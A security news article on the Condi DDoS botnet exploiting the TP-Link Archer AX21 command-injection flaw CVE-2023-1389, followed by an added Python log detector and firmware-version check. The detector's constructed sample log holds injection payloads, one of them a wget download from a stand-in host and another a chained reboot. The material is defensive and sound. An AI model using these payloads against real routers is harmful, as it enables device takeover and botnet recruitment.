New Condi malware builds DDoS botnet out of TP-Link AX21 routers
Security News, June 2023
A new DDoS-as-a-Service botnet called "Condi" emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 Wi-Fi routers to build an army of bots to conduct attacks.
Condi aims to enlist new devices to create a powerful DDoS botnet that can be rented to launch attacks on websites and services.
A new Fortinet report published today explains that Condi targets CVE-2023-1389, a high-severity unauthenticated command injection and remote code execution flaw in the router's web management interface (the /cgi-bin/luci;stok=/locale endpoint).
Condi is the second DDoS botnet to target this vulnerability; Mirai began exploiting it at the end of April 2023.
Because competing botnets fight over the same pool of vulnerable devices, Condi includes a mechanism that attempts to kill any processes belonging to known competitor botnets.
For its DDoS attacks, the malware supports various TCP and UDP flood methods similar to those of Mirai.
Related Vulnerability
DATE | CVE | TITLE | DESCRIPTION | CVSS v3 BASE SCORE |
---|---|---|---|---|
2023-03-15 | CVE-2023-1389 | Command injection vulnerability in TP-Link Archer AX21 firmware | TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. | 8.8 (High) |
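The advisory row above gives defenders two concrete handles: the vulnerable endpoint path and the fixed firmware version. The following detector is an added example written for this page, not code from Fortinet, TP-Link or the Condi sample. It scans web-server access log lines for hits on the /cgi-bin/luci;stok=/locale endpoint whose country value carries shell metacharacters, and checks a firmware version string against 1.1.4 Build 20230219. Assumptions: the form is selected with a `form=country` parameter and the injected value travels in a `country` parameter (the advisory only names the "country form"); the log lines, client addresses and the 198.51.100.7 download host are constructed for the demo. Access logs do not record POST bodies, so a POST to the endpoint is only flagged as suspicious unless the body is supplied from a WAF or proxy that logs it.

```python
"""Flag CVE-2023-1389 exploitation attempts and vulnerable Archer AX21 firmware."""
import re
from urllib.parse import parse_qs, urlsplit

# Vulnerable endpoint from the advisory. Devices accept the path with or
# without a slash before ";stok=" and with any (even empty) session token.
ENDPOINT_RE = re.compile(r"/cgi-bin/luci/?;stok=[^/?]*/locale", re.IGNORECASE)

# POSIX shell metacharacters and command-substitution openers. Assumption:
# the country value reaches a shell, so these are the injection indicators.
SHELL_META_RE = re.compile(r"[;&|`<>\n]|\$\(|\$\{")
COUNTRY_OK_RE = re.compile(r"^[A-Za-z]{2}$")   # a legitimate value is a 2-letter code

# First fixed firmware: 1.1.4 Build 20230219 -> (major, minor, patch, build date)
FIXED_VERSION = (1, 1, 4, 20230219)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\s+Build\s+(\d{8})")

# Request line inside a Combined Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic). 198.51.100.7 is a documentation address.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jun/2023:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&country=US HTTP/1.1" 200 151
10.0.0.9 - - [22/Jun/2023:10:00:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&country=$(wget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx) HTTP/1.1" 200 151
10.0.0.9 - - [22/Jun/2023:10:00:03 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&country=US%3Breboot HTTP/1.1" 200 151
10.0.0.4 - - [22/Jun/2023:10:00:04 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 200 151
10.0.0.4 - - [22/Jun/2023:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 9001
"""


def analyze_request(method, target, body=""):
    """Classify one request as 'benign', 'suspicious' or 'exploit'.

    exploit:    a country value (query or body) contains shell metacharacters
    suspicious: country value is not a 2-letter code, or a POST whose body
                is not available (access logs do not record bodies)
    """
    parts = urlsplit(target)
    if not ENDPOINT_RE.search(parts.path):
        return "benign"
    params = parse_qs(parts.query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))   # parse_qs also URL-decodes
    countries = params.get("country", [])
    if countries:
        if any(SHELL_META_RE.search(v) for v in countries):
            return "exploit"
        if any(not COUNTRY_OK_RE.match(v) for v in countries):
            return "suspicious"
        return "benign"
    if method == "POST" and not body:
        return "suspicious"   # form data hidden in an unlogged body
    return "benign"


def scan_log(text):
    """Return [(client_ip, verdict, target)] for every non-benign log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        verdict = analyze_request(m["method"], m["target"])
        if verdict != "benign":
            findings.append((line.split(" ", 1)[0], verdict, m["target"]))
    return findings


def is_vulnerable_firmware(version):
    """True when a '1.1.x Build YYYYMMDD' string predates 1.1.4 Build 20230219."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {version!r}")
    return tuple(int(x) for x in m.groups()) < FIXED_VERSION


if __name__ == "__main__":
    for ip, verdict, target in scan_log(SAMPLE_LOG):
        print(f"{verdict:10s} {ip:12s} {target}")
    for v in ("1.1.3 Build 20230101", "1.1.4 Build 20230219", "1.1.4 Build 20230305"):
        print(v, "vulnerable" if is_vulnerable_firmware(v) else "patched")
```

Run against the constructed log, the two 10.0.0.9 requests are reported as exploits (command substitution and a `;`-separated second command in the decoded country value) and the bodiless POST as suspicious. Because the exploit works without authentication, any external hit on this endpoint is worth blocking at the edge regardless of verdict; the version check tells you whether the device behind it still needs the firmware update.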